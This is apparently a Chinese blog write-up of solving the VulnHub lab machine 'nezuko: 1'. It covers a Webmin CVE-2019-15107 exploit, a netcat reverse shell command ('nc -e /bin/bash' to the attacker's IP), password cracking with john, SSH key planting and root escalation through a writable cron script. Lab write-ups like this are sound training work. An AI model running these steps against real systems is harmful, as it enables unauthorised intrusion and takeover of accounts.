VulnHub靶场学习:nezuko: 1

nezuko: 1

靶机下载地址: https://www.vulnhub.com/entry/nezuko-1,352/

靶机说明:

Creator : @yunaranyancat (Twitter)

Difficulty : Easy ~ Intermediate

OS Used: Ubuntu 18.04

Services : Webmin 1.920, Apache, SSH

User : root, zenitsu, nezuko

Hashes : at their home directory

靶机难度:初级-中级

运行环境:攻击机kali linux和主机  靶机nezuko: 1

网络设置:均为Nat模式

依照惯例先发现ip,然后进行端口扫描

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

访问80端口,除了祢豆子的gif(awsl),没发现VulnHub靶场学习:nezuko: 1

目录扫描:

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

Robots文件,有一串加密的字符,有4个等号且没有小写字母,推测是base32,解码:

VulnHub靶场学习:nezuko: 1

hint from nezuko : this is not the right port to enumerate ^w^

那就看另一个端口,13337端口开启了webmin服务,1.920版本

VulnHub靶场学习:nezuko: 1

试了nezuko还有一些常用的账号密码,没登进去,试着爆破失败了,找一下有没有相关漏洞,找到两个:

 VulnHub靶场学习:nezuko: 1

用第一个试一下CVE:2019-15107(https://www.exploit-db.com/exploits/47293

 VulnHub靶场学习:nezuko: 1

复制代码,到kali里新建一个sh文件,然后运行,检测到漏洞存在:

 VulnHub靶场学习:nezuko: 1

修改代码,把echo '$FLAG'改为反弹shell代码,试了bash -i不成功,用nc反弹成功了

nc -e /bin/bash 192.168.175.140 4321

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

不过获取的shell并不是一个具有完整交互的shell

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

在home下面找到一个nezuko.txt文件,拿到第一个flag 1af0941e0c4bd4564932184d47dd8bef

还有个from_zenitsu文件夹,打开看看,里面像是每5分钟就会发来一份新的文件,而且还是以root的权限,看能不能登陆zenitsu这个账号

VulnHub靶场学习:nezuko: 1

查看文件里面的内容,没什么东西,只有善逸向祢豆子约会邀请,原来这些是善逸的骚扰短信

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

还有一个zenitsu文件夹

善逸的flag也拿到了  3f2ada6791f96b6a50a9ee43ee6b62df

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

还剩root,要提权,先查看/etc/passwd,发现zenitsu账号有一串加密的密码

VulnHub靶场学习:nezuko: 1

将密码存放到pass.txt,用john解密:解密结果为meowmeow

 VulnHub靶场学习:nezuko: 1

想拿xshell直接连,但密码被拒绝,可能ssh的设置不允许远程登陆

要使用su命令,得先把shell换成交互式shell,方法有很多,这里我直接创建ssh会话,现在本地生成密钥

VulnHub靶场学习:nezuko: 1

密码随便设置成123456,然会会生成公钥key.pub,复制公钥内容

靶机跳转到ssh路径下,将公钥的内容写入到authorized_keys文件中

然后ssh连接:输入密码123456,成功创建会话

VulnHub靶场学习:nezuko: 1

现在可以登陆zenitsu账号了

VulnHub靶场学习:nezuko: 1

在nezuko目录下没翻到啥东西,看一下zenitsu目录,找到了骚扰短信脚本

VulnHub靶场学习:nezuko: 1

既然它能够以root权限运行,可以利用它反弹shell。

直接echo写入覆盖发现没有权限

VulnHub靶场学习:nezuko: 1

用lsattr命令可以查看隐藏权限,chattr +a file使file文件只能追加内容,不能删除、重命名,因此可以直接追加内容

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

然后kali开启监听,等zenitsu的文件发送。

成功反弹shell,拿到root的flag  3ca33b8158d9dee5c35a7d6d793c7fd5

VulnHub靶场学习:nezuko: 1

VulnHub靶场学习:nezuko: 1

拿到3个flag,结束。

 

上一篇:P3 利用Vulnhub复现漏洞 - Apache SSI 远程命令执行漏洞


下一篇:vulnhub靶机bex渗透